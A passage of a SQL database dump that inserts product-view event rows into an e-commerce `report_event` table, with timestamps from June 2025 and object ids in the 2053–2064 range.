(17579, '2025-06-10 04:42:16', 1, 2063, 0, 1, 1),
(17580, '2025-06-10 04:42:21', 1, 2061, 0, 1, 1),
(17581, '2025-06-10 04:42:27', 1, 2059, 0, 1, 1),
(17582, '2025-06-10 04:42:33', 1, 2058, 0, 1, 1),
(17583, '2025-06-10 04:42:39', 1, 2055, 0, 1, 1),
(17584, '2025-06-10 04:42:44', 1, 2054, 0, 1, 1),
(17585, '2025-06-10 04:42:50', 1, 2060, 0, 1, 1),
(17586, '2025-06-10 07:55:35', 1, 2061, 0, 1, 1),
(17587, '2025-06-10 09:10:43', 1, 2054, 0, 1, 1),
(17588, '2025-06-10 09:10:48', 1, 2064, 0, 1, 1),
(17589, '2025-06-10 09:13:31', 1, 2062, 0, 1, 1),
(17590, '2025-06-10 09:13:48', 1, 2061, 0, 1, 1),
(17591, '2025-06-10 09:14:05', 1, 2063, 0, 1, 1),
(17592, '2025-06-10 09:14:37', 1, 2059, 0, 1, 1),
(17593, '2025-06-10 09:14:54', 1, 2058, 0, 1, 1),
(17594, '2025-06-10 09:15:10', 1, 2055, 0, 1, 1),
(17595, '2025-06-10 09:15:27', 1, 2054, 0, 1, 1),
(17596, '2025-06-10 09:16:00', 1, 2060, 0, 1, 1),
(17597, '2025-06-10 09:54:18', 1, 2061, 0, 1, 1),
(17598, '2025-06-10 15:34:07', 1, 2062, 0, 1, 1),
(17599, '2025-06-10 17:16:16', 1, 2061, 0, 1, 1),
(17600, '2025-06-10 17:35:56', 1, 2063, 0, 1, 1),
(17601, '2025-06-10 20:29:29', 1, 2063, 0, 1, 1),
(17602, '2025-06-10 21:43:54', 1, 2054, 0, 1, 1),
(17603, '2025-06-10 21:58:38', 1, 2055, 0, 1, 1),
(17604, '2025-06-10 22:41:10', 1, 2063, 0, 1, 1),
(17605, '2025-06-10 22:41:14', 1, 2061, 0, 1, 1),
(17606, '2025-06-10 22:41:22', 1, 2062, 0, 1, 1),
(17607, '2025-06-11 02:49:40', 1, 2062, 0, 1, 1),
(17608, '2025-06-11 03:01:16', 1, 2061, 0, 1, 1),
(17609, '2025-06-11 05:05:09', 1, 2054, 0, 1, 1),
(17610, '2025-06-11 06:47:34', 1, 2060, 0, 1, 1),
(17611, '2025-06-11 07:10:30', 1, 2061, 0, 1, 1),
(17612, '2025-06-11 11:40:29', 1, 2055, 0, 1, 1),
(17613, '2025-06-11 12:12:53', 1, 2058, 0, 1, 1),
(17614, '2025-06-11 13:20:27', 1, 2055, 0, 1, 1),
(17615, '2025-06-11 15:35:10', 1, 2062, 0, 1, 1),
(17616, '2025-06-12 04:49:49', 1, 2064, 0, 1, 1),
(17617, '2025-06-12 06:03:51', 1, 2064, 0, 1, 1),
(17618, '2025-06-12 08:46:12', 1, 2058, 0, 1, 1),
(17619, '2025-06-12 09:59:15', 1, 2060, 0, 1, 1),
(17620, '2025-06-12 13:51:57', 1, 2060, 0, 1, 1),
(17621, '2025-06-12 14:17:46', 1, 2064, 0, 1, 1),
(17622, '2025-06-12 15:46:17', 1, 2062, 0, 1, 1),
(17623, '2025-06-12 17:11:51', 1, 2058, 0, 1, 1),
(17624, '2025-06-12 17:19:15', 1, 2064, 0, 1, 1),
(17625, '2025-06-12 17:26:30', 1, 2059, 0, 1, 1),
(17626, '2025-06-12 18:09:58', 1, 2064, 0, 1, 1),
(17627, '2025-06-12 19:05:46', 1, 2060, 0, 1, 1),
(17628, '2025-06-12 21:20:36', 1, 2058, 0, 1, 1),
(17629, '2025-06-12 21:20:40', 1, 2054, 0, 1, 1),
(17630, '2025-06-13 01:42:25', 1, 2064, 0, 1, 1),
(17631, '2025-06-13 01:50:05', 1, 2061, 0, 1, 1),
(17632, '2025-06-13 02:01:45', 1, 2058, 0, 1, 1),
(17633, '2025-06-13 02:12:34', 1, 2055, 0, 1, 1),
(17634, '2025-06-13 02:21:12', 1, 2054, 0, 1, 1),
(17635, '2025-06-13 02:31:04', 1, 2062, 0, 1, 1),
(17636, '2025-06-13 03:36:19', 1, 2058, 0, 1, 1),
(17637, '2025-06-13 06:46:41', 1, 2059, 0, 1, 1),
(17638, '2025-06-13 07:58:36', 1, 2062, 0, 1, 1),
(17639, '2025-06-13 09:14:37', 1, 2063, 0, 1, 1),
(17640, '2025-06-13 10:05:02', 1, 2063, 0, 1, 1),
(17641, '2025-06-13 12:45:19', 1, 2064, 0, 1, 1),
(17642, '2025-06-13 15:43:52', 1, 2062, 0, 1, 1),
(17643, '2025-06-13 16:12:53', 1, 2064, 0, 1, 1),
(17644, '2025-06-13 17:38:01', 1, 2059, 0, 1, 1),
(17645, '2025-06-14 01:51:59', 1, 2053, 0, 1, 1),
(17646, '2025-06-14 02:21:27', 1, 2058, 0, 1, 1),
(17647, '2025-06-14 08:46:24', 1, 2062, 0, 1, 1),
(17648, '2025-06-14 12:02:37', 1, 2059, 0, 1, 1),
(17649, '2025-06-14 12:02:42', 1, 2058, 0, 1, 1),
(17650, '2025-06-14 12:02:43', 1, 2062, 0, 1, 1),
(17651, '2025-06-14 12:02:44', 1, 2061, 0, 1, 1),
(17652, '2025-06-14 12:02:45', 1, 2063, 0, 1, 1),
(17653, '2025-06-14 12:02:47', 1, 2055, 0, 1, 1),
(17654, '2025-06-14 12:02:49', 1, 2054, 0, 1, 1),
(17655, '2025-06-14 12:02:52', 1, 2060, 0, 1, 1),
(17656, '2025-06-14 12:02:54', 1, 2064, 0, 1, 1),
(17657, '2025-06-14 13:31:56', 1, 2062, 0, 1, 1),
(17658, '2025-06-14 14:16:40', 1, 2062, 0, 1, 1),
(17659, '2025-06-15 00:52:30', 1, 2062, 0, 1, 1),
(17660, '2025-06-15 01:59:06', 1, 2054, 0, 1, 1),
(17661, '2025-06-15 03:09:11', 1, 2063, 0, 1, 1),
(17662, '2025-06-15 09:18:33', 1, 2058, 0, 1, 1),
(17663, '2025-06-15 12:16:40', 1, 2053, 0, 1, 1),
(17664, '2025-06-15 13:20:46', 1, 2064, 0, 1, 1),
(17665, '2025-06-15 14:00:41', 1, 2064, 0, 1, 1),
(17666, '2025-06-15 15:04:39', 1, 2062, 0, 1, 1),
(17667, '2025-06-15 22:55:44', 1, 2064, 0, 1, 1),
(17668, '2025-06-15 22:59:22', 1, 2053, 0, 1, 1),
(17669, '2025-06-15 23:09:14', 1, 2059, 0, 1, 1),
(17670, '2025-06-16 01:43:05', 1, 2059, 0, 1, 1),
(17671, '2025-06-16 02:25:33', 1, 2064, 0, 1, 1),
(17672, '2025-06-16 03:16:30', 1, 2064, 0, 1, 1),
(17673, '2025-06-16 11:09:41', 1, 2064, 0, 1, 1),
(17674, '2025-06-16 13:46:21', 1, 2062, 0, 1, 1),
(17675, '2025-06-16 17:57:54', 1, 2064, 0, 1, 1),
(17676, '2025-06-16 21:24:05', 1, 2058, 0, 1, 1),
(17677, '2025-06-16 22:08:37', 1, 2063, 0, 1, 1),
(17678, '2025-06-16 22:54:56', 1, 2063, 0, 1, 1),
(17679, '2025-06-16 22:55:00', 1, 2061, 0, 1, 1),
(17680, '2025-06-16 22:55:08', 1, 2062, 0, 1, 1),
(17681, '2025-06-16 23:16:35', 1, 2053, 0, 1, 1),
(17682, '2025-06-17 02:01:10', 1, 2063, 0, 1, 1),
(17683, '2025-06-17 03:43:18', 1, 2064, 0, 1, 1),
(17684, '2025-06-17 03:43:40', 1, 2059, 0, 1, 1),
(17685, '2025-06-17 03:48:24', 1, 2064, 0, 1, 1),
(17686, '2025-06-17 05:53:08', 1, 2054, 0, 1, 1),
(17687, '2025-06-17 06:02:40', 1, 2064, 0, 1, 1),
(17688, '2025-06-17 06:05:35', 1, 2054, 0, 1, 1),
(17689, '2025-06-17 06:50:17', 1, 2064, 0, 1, 1),
(17690, '2025-06-17 06:55:40', 1, 2054, 0, 1, 1),
(17691, '2025-06-17 08:58:58', 1, 2061, 0, 1, 1),
(17692, '2025-06-17 12:34:53', 1, 2064, 0, 1, 1),
(17693, '2025-06-17 12:37:45', 1, 2062, 0, 1, 1),
(17694, '2025-06-17 12:38:03', 1, 2053, 0, 1, 1),
(17695, '2025-06-17 12:38:21', 1, 2061, 0, 1, 1),
(17696, '2025-06-17 12:38:39', 1, 2063, 0, 1, 1),
(17697, '2025-06-17 12:39:13', 1, 2059, 0, 1, 1),
(17698, '2025-06-17 12:39:30', 1, 2058, 0, 1, 1),
(17699, '2025-06-17 12:39:47', 1, 2055, 0, 1, 1),
(17700, '2025-06-17 12:40:05', 1, 2054, 0, 1, 1),
(17701, '2025-06-17 12:40:22', 1, 2060, 0, 1, 1),
(17702, '2025-06-17 14:22:28', 1, 2062, 0, 1, 1),
(17703, '2025-06-17 18:14:02', 1, 2064, 0, 1, 1),
(17704, '2025-06-17 21:40:44', 1, 2054, 0, 1, 1),
(17705, '2025-06-17 22:16:55', 1, 2064, 0, 1, 1),
(17706, '2025-06-17 22:27:09', 1, 2063, 0, 1, 1),
(17707, '2025-06-17 23:37:04', 1, 2062, 0, 1, 1),
(17708, '2025-06-17 23:40:11', 1, 2064, 0, 1, 1),
(17709, '2025-06-18 00:11:10', 1, 2061, 0, 1, 1),
(17710, '2025-06-18 03:26:02', 1, 2062, 0, 1, 1),
(17711, '2025-06-18 03:47:26', 1, 2060, 0, 1, 1),
(17712, '2025-06-18 03:57:21', 1, 2063, 0, 1, 1),
(17713, '2025-06-18 04:13:46', 1, 2054, 0, 1, 1),
(17714, '2025-06-18 04:24:26', 1, 2058, 0, 1, 1),
(17715, '2025-06-18 04:46:15', 1, 2055, 0, 1, 1),
(17716, '2025-06-18 04:48:13', 1, 2064, 0, 1, 1),
(17717, '2025-06-18 04:48:38', 1, 2062, 0, 1, 1),
(17718, '2025-06-18 05:15:20', 1, 2055, 0, 1, 1),
(17719, '2025-06-18 05:51:43', 1, 2058, 0, 1, 1),
(17720, '2025-06-18 05:52:58', 1, 2064, 0, 1, 1),
(17721, '2025-06-18 05:59:28', 1, 2063, 0, 1, 1),
(17722, '2025-06-18 06:08:03', 1, 2054, 0, 1, 1),
(17723, '2025-06-18 06:08:14', 1, 2064, 0, 1, 1),
(17724, '2025-06-18 06:22:53', 1, 2061, 0, 1, 1),
(17725, '2025-06-18 06:29:22', 1, 2064, 0, 1, 1),
(17726, '2025-06-18 06:31:48', 1, 2058, 0, 1, 1),
(17727, '2025-06-18 06:40:36', 1, 2055, 0, 1, 1),
(17728, '2025-06-18 06:46:05', 1, 2061, 0, 1, 1),
(17729, '2025-06-18 06:50:16', 1, 2060, 0, 1, 1),
(17730, '2025-06-18 06:51:06', 1, 2054, 0, 1, 1),
(17731, '2025-06-18 06:56:31', 1, 2061, 0, 1, 1),
(17732, '2025-06-18 07:00:01', 1, 2060, 0, 1, 1),
(17733, '2025-06-18 07:20:45', 1, 2061, 0, 1, 1),
(17734, '2025-06-18 07:30:52', 1, 2062, 0, 1, 1),
(17735, '2025-06-18 08:01:31', 1, 2064, 0, 1, 1),
(17736, '2025-06-18 08:46:47', 1, 2054, 0, 1, 1),
(17737, '2025-06-18 09:02:16', 1, 2059, 0, 1, 1),
(17738, '2025-06-18 09:16:12', 1, 2064, 0, 1, 1),
(17739, '2025-06-18 09:47:53', 1, 2061, 0, 1, 1),
(17740, '2025-06-18 11:39:52', 1, 2055, 0, 1, 1),
(17741, '2025-06-18 11:47:16', 1, 2064, 0, 1, 1),
(17742, '2025-06-18 12:36:56', 1, 2059, 0, 1, 1),
(17743, '2025-06-18 13:27:21', 1, 2059, 0, 1, 1),
(17744, '2025-06-18 14:23:49', 1, 2063, 0, 1, 1),
(17745, '2025-06-18 14:59:48', 1, 2062, 0, 1, 1),
(17746, '2025-06-18 16:16:31', 1, 2064, 0, 1, 1),
(17747, '2025-06-18 16:19:29', 1, 2064, 0, 1, 1),
(17748, '2025-06-18 18:50:07', 1, 2054, 0, 1, 1),
(17749, '2025-06-18 20:55:12', 1, 2054, 0, 1, 1),
(17750, '2025-06-18 21:17:30', 1, 2063, 0, 1, 1),
(17751, '2025-06-18 21:55:15', 1, 2064, 0, 1, 1),
(17752, '2025-06-18 21:58:00', 1, 2064, 0, 1, 1),
(17753, '2025-06-18 22:49:17', 1, 2054, 0, 1, 1),
(17754, '2025-06-19 00:14:30', 1, 2064, 0, 1, 1),
(17755, '2025-06-19 00:19:44', 1, 2053, 0, 1, 1),
(17756, '2025-06-19 03:48:10', 1, 2054, 0, 1, 1),
(17757, '2025-06-19 04:11:29', 1, 2059, 0, 1, 1),
(17758, '2025-06-19 04:42:53', 1, 2064, 0, 1, 1),
(17759, '2025-06-19 05:33:53', 1, 2054, 0, 1, 1),
(17760, '2025-06-19 06:44:03', 1, 2061, 0, 1, 1),
(17761, '2025-06-19 06:45:41', 1, 2059, 0, 1, 1),
(17762, '2025-06-19 08:42:31', 1, 2059, 0, 1, 1),
(17763, '2025-06-19 08:54:57', 1, 2058, 0, 1, 1),
(17764, '2025-06-19 09:15:50', 1, 2063, 0, 1, 1),
(17765, '2025-06-19 10:53:17', 1, 2059, 0, 1, 1),
(17766, '2025-06-19 12:35:28', 1, 2054, 0, 1, 1),
(17767, '2025-06-19 13:41:17', 1, 2060, 0, 1, 1),
(17768, '2025-06-19 15:05:22', 1, 2062, 0, 1, 1),
(17769, '2025-06-19 15:57:38', 1, 2060, 0, 1, 1),
(17770, '2025-06-19 16:07:12', 1, 2064, 0, 1, 1),
(17771, '2025-06-19 16:10:19', 1, 2064, 0, 1, 1),
(17772, '2025-06-19 17:45:22', 1, 2055, 0, 1, 1),
(17773, '2025-06-19 18:16:25', 1, 2059, 0, 1, 1),
(17774, '2025-06-19 19:27:49', 1, 2053, 0, 1, 1),
(17775, '2025-06-19 19:43:22', 1, 2054, 0, 1, 1),
(17776, '2025-06-19 19:43:27', 1, 2058, 0, 1, 1),
(17777, '2025-06-19 21:57:21', 1, 2054, 0, 1, 1),
(17778, '2025-06-20 02:27:00', 1, 2059, 0, 1, 1),
(17779, '2025-06-20 03:11:50', 1, 2063, 0, 1, 1),
(17780, '2025-06-20 04:23:43', 1, 2064, 0, 1, 1),
(17781, '2025-06-20 04:24:56', 1, 2055, 0, 1, 1),
(17782, '2025-06-20 06:33:56', 1, 2059, 0, 1, 1),
(17783, '2025-06-20 10:22:43', 1, 2054, 0, 1, 1),
(17784, '2025-06-20 10:57:51', 1, 2061, 0, 1, 1),
(17785, '2025-06-20 11:02:47', 1, 2064, 0, 1, 1),
(17786, '2025-06-20 14:55:42', 1, 2062, 0, 1, 1),
(17787, '2025-06-20 16:10:59', 1, 2054, 0, 1, 1),
(17788, '2025-06-20 17:10:38', 1, 2062, 0, 1, 1),
(17789, '2025-06-20 18:43:26', 1, 2055, 0, 1, 1),
(17790, '2025-06-20 19:49:21', 1, 2053, 0, 1, 1),
(17791, '2025-06-20 20:35:56', 1, 2054, 0, 1, 1),
(17792, '2025-06-20 20:36:03', 1, 2064, 0, 1, 1),
(17793, '2025-06-21 00:39:04', 1, 2062, 0, 1, 1),
(17794, '2025-06-21 02:14:54', 1, 2064, 0, 1, 1),
(17795, '2025-06-21 02:38:20', 1, 2053, 0, 1, 1),
(17796, '2025-06-21 03:00:55', 1, 2064, 0, 1, 1),
(17797, '2025-06-21 03:10:35', 1, 2064, 0, 1, 1),
(17798, '2025-06-21 04:03:30', 1, 2053, 0, 1, 1),
(17799, '2025-06-21 06:07:58', 1, 2061, 0, 1, 1),
(17800, '2025-06-21 07:59:32', 1, 2064, 0, 1, 1),
(17801, '2025-06-21 10:22:23', 1, 2058, 0, 1, 1),
(17802, '2025-06-21 10:27:52', 1, 2064, 0, 1, 1),
(17803, '2025-06-21 10:50:05', 1, 2064, 0, 1, 1),
(17804, '2025-06-21 10:56:24', 1, 2053, 0, 1, 1),
(17805, '2025-06-21 12:54:46', 1, 2054, 0, 1, 1),
(17806, '2025-06-21 14:02:21', 1, 2062, 0, 1, 1),
(17807, '2025-06-21 17:42:02', 1, 2064, 0, 1, 1),
(17808, '2025-06-21 19:13:04', 1, 2064, 0, 1, 1),
(17809, '2025-06-21 20:51:29', 1, 2053, 0, 1, 1),
(17810, '2025-06-22 00:04:35', 1, 2053, 0, 1, 1),
(17811, '2025-06-22 01:34:16', 1, 2054, 0, 1, 1),
(17812, '2025-06-22 02:15:37', 1, 2053, 0, 1, 1),
(17813, '2025-06-22 02:36:02', 1, 2064, 0, 1, 1),
(17814, '2025-06-22 04:42:29', 1, 2064, 0, 1, 1),
(17815, '2025-06-22 10:16:51', 1, 2053, 0, 1, 1),
(17816, '2025-06-22 12:46:54', 1, 2064, 0, 1, 1),
(17817, '2025-06-22 15:25:26', 1, 2062, 0, 1, 1),
(17818, '2025-06-22 15:48:23', 1, 2064, 0, 1, 1),
(17819, '2025-06-22 16:48:39', 1, 2064, 0, 1, 1),
(17820, '2025-06-22 16:58:52', 1, 2059, 0, 1, 1),
(17821, '2025-06-22 17:19:27', 1, 2062, 0, 1, 1),
(17822, '2025-06-22 17:51:26', 1, 2060, 0, 1, 1),
(17823, '2025-06-22 18:16:58', 1, 2062, 0, 1, 1),
(17824, '2025-06-22 19:06:17', 1, 2064, 0, 1, 1),
(17825, '2025-06-22 21:05:49', 1, 2064, 0, 1, 1),
(17826, '2025-06-22 21:26:29', 1, 2053, 0, 1, 1),
(17827, '2025-06-22 22:09:19', 1, 2064, 0, 1, 1),
(17828, '2025-06-22 23:33:49', 1, 2064, 0, 1, 1),
(17829, '2025-06-22 23:44:19', 1, 2063, 0, 1, 1),
(17830, '2025-06-23 00:01:27', 1, 2064, 0, 1, 1),
(17831, '2025-06-23 00:08:11', 1, 2053, 0, 1, 1),
(17832, '2025-06-23 00:16:00', 1, 2061, 0, 1, 1),
(17833, '2025-06-23 00:33:33', 1, 2058, 0, 1, 1),
(17834, '2025-06-23 01:34:58', 1, 2058, 0, 1, 1),
(17835, '2025-06-23 03:31:23', 1, 2054, 0, 1, 1),
(17836, '2025-06-23 04:01:43', 1, 2064, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(17837, '2025-06-23 05:33:51', 1, 2059, 0, 1, 1),
(17838, '2025-06-23 05:35:40', 1, 2060, 0, 1, 1),
(17839, '2025-06-23 06:04:46', 1, 2064, 0, 1, 1),
(17840, '2025-06-23 06:27:47', 1, 2064, 0, 1, 1),
(17841, '2025-06-23 06:57:30', 1, 2054, 0, 1, 1),
(17842, '2025-06-23 07:09:16', 1, 2055, 0, 1, 1),
(17843, '2025-06-23 07:17:33', 1, 2054, 0, 1, 1),
(17844, '2025-06-23 07:22:12', 1, 2064, 0, 1, 1),
(17845, '2025-06-23 07:36:01', 1, 2055, 0, 1, 1),
(17846, '2025-06-23 08:11:12', 1, 2053, 0, 1, 1),
(17847, '2025-06-23 08:24:08', 1, 2053, 0, 1, 1),
(17848, '2025-06-23 13:31:51', 1, 2055, 0, 1, 1),
(17849, '2025-06-23 14:43:40', 1, 2062, 0, 1, 1),
(17850, '2025-06-23 15:28:54', 1, 2061, 0, 1, 1),
(17851, '2025-06-23 15:40:14', 1, 2058, 0, 1, 1),
(17852, '2025-06-23 17:53:55', 1, 2064, 0, 1, 1),
(17853, '2025-06-23 18:13:06', 1, 2060, 0, 1, 1),
(17854, '2025-06-23 18:14:20', 1, 2059, 0, 1, 1),
(17855, '2025-06-23 18:38:47', 1, 2064, 0, 1, 1),
(17856, '2025-06-23 19:32:50', 1, 2064, 0, 1, 1),
(17857, '2025-06-23 20:05:16', 1, 2064, 0, 1, 1),
(17858, '2025-06-23 21:17:55', 1, 2064, 0, 1, 1),
(17859, '2025-06-23 22:40:58', 1, 2053, 0, 1, 1),
(17860, '2025-06-23 22:48:02', 1, 2063, 0, 1, 1),
(17861, '2025-06-23 22:48:06', 1, 2062, 0, 1, 1),
(17862, '2025-06-23 22:48:10', 1, 2061, 0, 1, 1),
(17863, '2025-06-24 00:10:34', 1, 2061, 0, 1, 1),
(17864, '2025-06-24 01:10:04', 1, 2053, 0, 1, 1),
(17865, '2025-06-24 01:32:04', 1, 2064, 0, 1, 1),
(17866, '2025-06-24 01:48:07', 1, 2054, 0, 1, 1),
(17867, '2025-06-24 02:03:51', 1, 2064, 0, 1, 1),
(17868, '2025-06-24 02:50:43', 1, 2059, 0, 1, 1),
(17869, '2025-06-24 03:08:22', 1, 2062, 0, 1, 1),
(17870, '2025-06-24 04:58:56', 1, 2059, 0, 1, 1),
(17871, '2025-06-24 06:49:06', 1, 2064, 0, 1, 1),
(17872, '2025-06-24 07:31:14', 1, 2063, 0, 1, 1),
(17873, '2025-06-24 07:31:17', 1, 2064, 0, 1, 1),
(17874, '2025-06-24 07:31:19', 1, 2055, 0, 1, 1),
(17875, '2025-06-24 07:31:24', 1, 2062, 0, 1, 1),
(17876, '2025-06-24 07:31:29', 1, 2060, 0, 1, 1),
(17877, '2025-06-24 07:31:31', 1, 2059, 0, 1, 1),
(17878, '2025-06-24 07:32:03', 1, 2053, 0, 1, 1),
(17879, '2025-06-24 07:32:32', 1, 2061, 0, 1, 1),
(17880, '2025-06-24 07:52:45', 1, 2064, 0, 1, 1),
(17881, '2025-06-24 08:51:36', 1, 2064, 0, 1, 1),
(17882, '2025-06-24 09:59:13', 1, 2061, 0, 1, 1),
(17883, '2025-06-24 10:33:08', 1, 2053, 0, 1, 1),
(17884, '2025-06-24 10:37:52', 1, 2060, 0, 1, 1),
(17885, '2025-06-24 11:52:33', 1, 2054, 0, 1, 1),
(17886, '2025-06-24 12:19:27', 1, 2064, 0, 1, 1),
(17887, '2025-06-24 14:17:24', 1, 2064, 0, 1, 1),
(17888, '2025-06-24 14:23:11', 1, 2053, 0, 1, 1),
(17889, '2025-06-24 14:24:12', 1, 2062, 0, 1, 1),
(17890, '2025-06-24 16:22:49', 1, 2053, 0, 1, 1),
(17891, '2025-06-24 16:58:59', 1, 2058, 0, 1, 1),
(17892, '2025-06-24 17:09:16', 1, 2064, 0, 1, 1),
(17893, '2025-06-24 17:42:03', 1, 2064, 0, 1, 1),
(17894, '2025-06-24 17:42:18', 1, 2064, 0, 1, 1),
(17895, '2025-06-24 18:05:02', 1, 2055, 0, 1, 1),
(17896, '2025-06-24 18:05:10', 1, 2064, 0, 1, 1),
(17897, '2025-06-24 18:05:15', 1, 2063, 0, 1, 1),
(17898, '2025-06-24 18:05:20', 1, 2062, 0, 1, 1),
(17899, '2025-06-24 18:05:23', 1, 2060, 0, 1, 1),
(17900, '2025-06-25 00:20:33', 1, 2054, 0, 1, 1),
(17901, '2025-06-25 00:26:38', 1, 2064, 0, 1, 1),
(17902, '2025-06-25 00:51:36', 1, 2053, 0, 1, 1),
(17903, '2025-06-25 01:17:56', 1, 2064, 0, 1, 1),
(17904, '2025-06-25 02:06:38', 1, 2054, 0, 1, 1),
(17905, '2025-06-25 02:32:17', 1, 2064, 0, 1, 1),
(17906, '2025-06-25 02:36:26', 1, 2053, 0, 1, 1),
(17907, '2025-06-25 03:47:24', 1, 2064, 0, 1, 1),
(17908, '2025-06-25 03:49:48', 1, 2061, 0, 1, 1),
(17909, '2025-06-25 04:24:30', 1, 2054, 0, 1, 1),
(17910, '2025-06-25 06:15:20', 1, 2059, 0, 1, 1),
(17911, '2025-06-25 06:31:46', 1, 2060, 0, 1, 1),
(17912, '2025-06-25 07:36:20', 1, 2064, 0, 1, 1),
(17913, '2025-06-25 08:17:58', 1, 2064, 0, 1, 1),
(17914, '2025-06-25 09:07:49', 1, 2053, 0, 1, 1),
(17915, '2025-06-25 09:22:21', 1, 2064, 0, 1, 1),
(17916, '2025-06-25 09:43:34', 1, 2058, 0, 1, 1),
(17917, '2025-06-25 09:53:09', 1, 2053, 0, 1, 1),
(17918, '2025-06-25 10:39:35', 1, 2064, 0, 1, 1),
(17919, '2025-06-25 11:29:15', 1, 2053, 0, 1, 1),
(17920, '2025-06-25 11:39:50', 1, 2055, 0, 1, 1),
(17921, '2025-06-25 13:20:42', 1, 2064, 0, 1, 1),
(17922, '2025-06-25 13:29:09', 1, 2064, 0, 1, 1),
(17923, '2025-06-25 13:42:50', 1, 2053, 0, 1, 1),
(17924, '2025-06-25 13:58:32', 1, 2059, 0, 1, 1),
(17925, '2025-06-25 14:10:37', 1, 2064, 0, 1, 1),
(17926, '2025-06-25 14:15:51', 1, 2053, 0, 1, 1),
(17927, '2025-06-25 14:25:40', 1, 2062, 0, 1, 1),
(17928, '2025-06-25 15:25:31', 1, 2064, 0, 1, 1),
(17929, '2025-06-25 17:34:02', 1, 2055, 0, 1, 1),
(17930, '2025-06-25 17:34:08', 1, 2064, 0, 1, 1),
(17931, '2025-06-25 17:34:10', 1, 2063, 0, 1, 1),
(17932, '2025-06-25 17:34:13', 1, 2062, 0, 1, 1),
(17933, '2025-06-25 17:34:16', 1, 2060, 0, 1, 1),
(17934, '2025-06-25 19:31:15', 1, 2053, 0, 1, 1),
(17935, '2025-06-25 20:12:34', 1, 2058, 0, 1, 1),
(17936, '2025-06-25 20:30:37', 1, 2064, 0, 1, 1),
(17937, '2025-06-25 20:56:30', 1, 2064, 0, 1, 1),
(17938, '2025-06-25 20:56:43', 1, 2064, 0, 1, 1),
(17939, '2025-06-25 21:08:05', 1, 2053, 0, 1, 1),
(17940, '2025-06-25 21:11:20', 1, 2064, 0, 1, 1),
(17941, '2025-06-25 21:48:24', 1, 2055, 0, 1, 1),
(17942, '2025-06-26 00:22:14', 1, 2058, 0, 1, 1),
(17943, '2025-06-26 01:53:05', 1, 2053, 0, 1, 1),
(17944, '2025-06-26 02:18:44', 1, 2064, 0, 1, 1),
(17945, '2025-06-26 02:36:58', 1, 2064, 0, 1, 1),
(17946, '2025-06-26 02:58:05', 1, 2064, 0, 1, 1),
(17947, '2025-06-26 03:43:03', 1, 2064, 0, 1, 1),
(17948, '2025-06-26 03:49:27', 1, 2054, 0, 1, 1),
(17949, '2025-06-26 04:41:54', 1, 2064, 0, 1, 1),
(17950, '2025-06-26 04:45:45', 1, 2053, 0, 1, 1),
(17951, '2025-06-26 06:41:39', 1, 2063, 0, 1, 1),
(17952, '2025-06-26 07:23:45', 1, 2064, 0, 1, 1),
(17953, '2025-06-26 07:35:25', 1, 2064, 0, 1, 1),
(17954, '2025-06-26 08:07:58', 1, 2064, 0, 1, 1),
(17955, '2025-06-26 08:12:20', 1, 2064, 0, 1, 1),
(17956, '2025-06-26 08:17:53', 1, 2064, 0, 1, 1),
(17957, '2025-06-26 08:27:20', 1, 2053, 0, 1, 1),
(17958, '2025-06-26 08:47:44', 1, 2058, 0, 1, 1),
(17959, '2025-06-26 09:40:16', 1, 2061, 0, 1, 1),
(17960, '2025-06-26 13:16:09', 1, 2064, 0, 1, 1),
(17961, '2025-06-26 13:30:41', 1, 2063, 0, 1, 1),
(17962, '2025-06-26 13:31:50', 1, 2060, 0, 1, 1),
(17963, '2025-06-26 13:56:02', 1, 2053, 0, 1, 1),
(17964, '2025-06-26 14:18:59', 1, 2062, 0, 1, 1),
(17965, '2025-06-26 14:26:19', 1, 2060, 0, 1, 1),
(17966, '2025-06-26 14:34:53', 1, 2063, 0, 1, 1),
(17967, '2025-06-26 14:58:16', 1, 2058, 0, 1, 1),
(17968, '2025-06-26 14:59:48', 1, 2064, 0, 1, 1),
(17969, '2025-06-26 15:50:21', 1, 2055, 0, 1, 1),
(17970, '2025-06-26 16:57:31', 1, 2055, 0, 1, 1),
(17971, '2025-06-26 16:57:37', 1, 2064, 0, 1, 1),
(17972, '2025-06-26 16:57:40', 1, 2063, 0, 1, 1),
(17973, '2025-06-26 16:57:43', 1, 2062, 0, 1, 1),
(17974, '2025-06-26 16:57:45', 1, 2060, 0, 1, 1),
(17975, '2025-06-26 17:27:32', 1, 2061, 0, 1, 1),
(17976, '2025-06-26 17:32:59', 1, 2059, 0, 1, 1),
(17977, '2025-06-26 18:18:20', 1, 2062, 0, 1, 1),
(17978, '2025-06-26 19:38:34', 1, 2054, 0, 1, 1),
(17979, '2025-06-26 19:43:13', 1, 2054, 0, 1, 1),
(17980, '2025-06-26 19:59:57', 1, 2064, 0, 1, 1),
(17981, '2025-06-26 20:10:28', 1, 2060, 0, 1, 1),
(17982, '2025-06-26 20:15:09', 1, 2053, 0, 1, 1),
(17983, '2025-06-26 20:20:32', 1, 2063, 0, 1, 1),
(17984, '2025-06-26 20:38:25', 1, 2064, 0, 1, 1),
(17985, '2025-06-26 20:48:14', 1, 2058, 0, 1, 1),
(17986, '2025-06-26 20:56:41', 1, 2055, 0, 1, 1),
(17987, '2025-06-26 20:56:53', 1, 2064, 0, 1, 1),
(17988, '2025-06-26 20:57:01', 1, 2063, 0, 1, 1),
(17989, '2025-06-26 20:57:12', 1, 2062, 0, 1, 1),
(17990, '2025-06-26 20:57:22', 1, 2060, 0, 1, 1),
(17991, '2025-06-26 21:47:03', 1, 2053, 0, 1, 1),
(17992, '2025-06-26 22:10:46', 1, 2060, 0, 1, 1),
(17993, '2025-06-26 22:20:51', 1, 2063, 0, 1, 1),
(17994, '2025-06-26 23:00:44', 1, 2060, 0, 1, 1),
(17995, '2025-06-26 23:11:20', 1, 2063, 0, 1, 1),
(17996, '2025-06-26 23:39:53', 1, 2058, 0, 1, 1),
(17997, '2025-06-27 00:28:25', 1, 2055, 0, 1, 1),
(17998, '2025-06-27 00:35:34', 1, 2053, 0, 1, 1),
(17999, '2025-06-27 01:45:22', 1, 2053, 0, 1, 1),
(18000, '2025-06-27 01:46:49', 1, 2061, 0, 1, 1),
(18001, '2025-06-27 02:08:00', 1, 2054, 0, 1, 1),
(18002, '2025-06-27 02:30:25', 1, 2062, 0, 1, 1),
(18003, '2025-06-27 02:40:20', 1, 2064, 0, 1, 1),
(18004, '2025-06-27 03:54:55', 1, 2054, 0, 1, 1),
